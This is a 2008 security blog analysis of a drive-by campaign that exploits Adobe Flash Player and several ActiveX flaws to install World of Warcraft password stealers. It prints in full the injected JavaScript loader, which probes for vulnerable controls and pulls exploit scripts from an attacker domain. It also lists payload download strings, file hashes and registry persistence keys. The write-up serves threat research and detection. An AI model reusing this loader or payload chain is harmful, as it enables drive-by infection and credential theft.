Wednesday, May 28, 2008

Adobe Flash Player Exploitation

Several sources including Symantec DeepSight, SANS ISC, and Dancho Danchev have reported in-the-wild exploitation of a vulnerability affecting Adobe Flash Player. The vulnerability was originally thought to be an 0-day, but analysis has revealed it is more likely the previously reported Adobe Flash Player SWF File Unspecified Remote Code Execution Vulnerability (CVE-2007-0071). Adobe Flash Player 9.0.115.0 is affected, and there are conflicting reports whether and to what degree the current version 9.0.124.0 is affected. Initial websites serving Flash exploit code include dota11.cn, wuqing17173.cn, woai117.cn, and play0nlnie.com. Script references to these sites (and a growing number of others) are belived to have been injected into legitimate websites through SQL injection attacks. The malicious sites utilize a Chinese MPack-type tool to generate numerous exploits in an effort to install PSW.OnlineGames trojans designed to exfiltrate gaming credentials. The following provides a sample analysis of wuqing17173.cn.

wuqing17173.cn Analysis:


A Google search for the identified malicious domain wuqing17173.cn (58.215.87.11) currently returns a single result that includes an injected iframe for count18[dot]wuqing17173[dot]cn/click.aspx.php.












The compromised accttstore.com site hosting the count18[dot]wuqing17173[dot]cn iframe deals with selling World of Warcraft (WoW) assets. The aversary end goal is to exfiltrate online gaming credentials, so websites dedicated to WoW are prime targets for injecting iframe and script redirects.








The count18[dot]wuqing17173[dot]cn/click.aspx.php connection returns what looks to be an HTTP 404 error, but the bottom of the page contains malicious JavaScript. The script checks for several ActiveX controls and if present, redirects the victim to specific exploit code hosted at www[dot]0novel[dot]com (58.215.87.11). The following vulnerabilities are attempted to be exploited.

File: Flash.swf, Flash1.swf
Vulnerability: Adobe Flash Player SWF File Unspecified Remote Code Execution Vulnerability
CVE: (BID 28695)

File: ms06014.js
Vulnerability: MDAC RDS.Dataspace ActiveX Control Vulnerability
CVE: CVE-2006-0003

File: Real.js
Vulnerability: RealPlayer IERPCtl ActiveX Playlist Handling Buffer Overflow Vulnerability
CVE: CVE-2007-5601

File: Lz.htm
Vulnerability: Ourgame GLWorld ActiveX Control Multiple Buffer Overflow Vulnerabilities
CVE: CVE-2008-0647

File: Bf.htm
Vulnerability: Baofeng Storm ActiveX Controls Multiple Remote Buffer Overflow Vulnerabilities
CVE: CVE-2007-4816, CVE-2007-4943

File: Xl.htm
Vulnerability: Xunlei Thunder DapPlayer ActiveX Control Buffer Overflow
CVE: CVE-2007-6144

count18[dot]wuqing17173[dot]cn/click.aspx.php code:

<script>window.onerror=function(){return true;}</script>
<Script Language="JScript">
var cook = "silentwm";
function setCookie(name, value, expire)
{
window.document.cookie = name + "=" + escape(value) + ((expire == null) ? "" : ("; expires=" + expire.toGMTString()));
}
function getCookie(Name)
{
var search = Name + "=";
if (window.document.cookie.length > 0)
{
offset = window.document.cookie.indexOf(search);
if (offset != -1)
{
offset += search.length;
end = window.document.cookie.indexOf(";", offset)
if (end == -1)
end = window.document.cookie.length;
return unescape(window.document.cookie.substring(offset, end));
}
}
return null;
}
function register(name)
{
var today = new Date();
var expires = new Date();
expires.setTime(today.getTime() + 1000*60*60*24);
setCookie(cook, name, expires);
}
function openWM()
{
var c = getCookie(cook);
if (c != null)
{
return;
}
register(cook);
window.defaultStatus="....";
try{ var e;
var ado=(document.createElement("object"));
ado.setAttribute("classid","clsid:BD96C556-65A3-11D0-983A-00C04FC29E36");
var as=ado.createobject("Adodb.Stream","")}
catch(e){};
finally{
if(e!="[object Error]"){
document.write("<script src=http:\/\/www.0novel.com\/ms06014.js><\/script>")}
else
{
var Flashver = (new ActiveXObject("ShockwaveFlash.ShockwaveFlash.9")).GetVariable("$version").split(",");
if(Flashver[2] == 115){document.write('<embed src="flash.swf"></embed>');}
if(Flashver[2] == 47){document.write('<embed src="flash1.swf"></embed>');}
try{ var j;
var real11=new ActiveXObject("IERP"+"Ctl.I"+"ERPCtl.1");}
catch(j){};
finally{if(j!="[object Error]"){if(new ActiveXObject("IERPCtl.IERPCtl.1").PlayerProperty("PRODUCTVERSION")<="6.0.14.552")
{document.write('<script src=http:\/\/www.0novel.com\/real.js><\/script>')}
else
{
document.write('<iframe width=10 height=0 src=rl.htm></iframe>')}}}
try{ var g;
var glworld=new ActiveXObject("GLIEDown.IEDown.1");}
catch(g){};
finally{if(g!="[object Error]"){
document.write('<iframe style=display:none src=lz.htm></iframe>')}}
try{ var h;
var storm=new ActiveXObject("MPS.StormPlayer.1");}
catch(h){};
finally{if(h!="[object Error]"){
document.write('<iframe style=display:none src=bf.htm></iframe>')}}
try{ var f;
var thunder=new ActiveXObject("DPClient.Vod");}
catch(f){};
finally{ if(f!="[object Error]"){
document.write('<iframe width=50 height=0 src=xl.htm></iframe>')}}
if(f=="[object Error]" && g=="[object Error]" && h=="[object Error]" && j=="[object Error]")
{location.replace("about:blank");}
}}
}
openWM();
</script>
<embed sRc=flash.swf width=50 height=0></embed>


The strings of Flash.swf include the payload http: //www[dot]lovedai[dot]cn/back.css (58.215.87.11) executed as c:\6123t.exe. The payload from the other exploits was www[dot]0novel[dot]com/back.css (58.215.87.11).

Flash.swf strings:

FWS
fHY<

`P3
t.x
urlmon.dll
SSR
;C:\6123t.exe
ahU
http: //www[dot]lovedai[dot]cn/back.css
t.x
C
new_fla MainTimeline
flash.display
MovieClip
new_fla:MainTimeline
frame1
addFrameScript
Object flash.events
EventDispatcher
DisplayObject
InteractiveObject
DisplayObjectContainer
Spritenew_fla.MainTimeline

Malware Analysis:

The malware back.css is a binary file designed to look like a cascading style sheet. The malware creates backow.dll in the victim’s Temp directory and creates and deletes C:\ w1.hiv and C:\w2.hiv. The malware backow.dll is detected as a Infostealer.Gampass variant (Symantec) designed to exfiltrate World of Warcraft (WoW) online gaming accounts.

Filename: back.css
MD5: 54939e5ffb291518a1fb0f28a92faf41
Size: 25.7 KB (26,368 bytes)

Back.css creates:

C:\Documents and Settings\username\Local Settings\Temp\backow.dll

Filename: backow.dll
MD5: 86909167e5b867ea509bd91dba6add03
Size: 14.2 KB (14,592 bytes)

The binary strings of backow.dll reveal WoW domains and the file realmlist.wtf which is a WoW text file that tells the WoW-client which server to connect to.

00003134 00403D34 0 realmlist.wtf
0000317C 00403D7C 0 .worldofwarcraft.com
0000319C 00403D9C 0 .wowchina.com


Back.css creates the following registry keys:

HKEY_CURRENT_USER\Software\ComWaraisn "{00211E3E-D7A2-456A-AE04-EB9ABF822FE4}"
Type: REG_SZ
Data:
HKEY_CURRENT_USER\Software\ComWaraisn "{AEB6717E-7E19-11d0-97EE-00C04FD91972}"
Type: REG_SZ
Data:
HKEY_CLASSES_ROOT\CLSID\{00211E3E-D7A2-456A-AE04-EB9ABF822FE4} "(Default)"
Type: REG_SZ
Data: Windows
HKEY_CLASSES_ROOT\CLSID\{00211E3E-D7A2-456A-AE04-EB9ABF822FE4}\InProcServer32 "(Default)"
Type: REG_SZ
Data: C:\DOCUME~1\username\LOCALS~1\Temp\backow.dll
HKEY_CLASSES_ROOT\CLSID\{00211E3E-D7A2-456A-AE04-EB9ABF822FE4}\InProcServer32 "ThreadingModel"
Type: REG_SZ
Data: Apartment
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks "{00211E3E-D7A2-456A-AE04-EB9ABF822FE4}"
Type: REG_SZ
Data: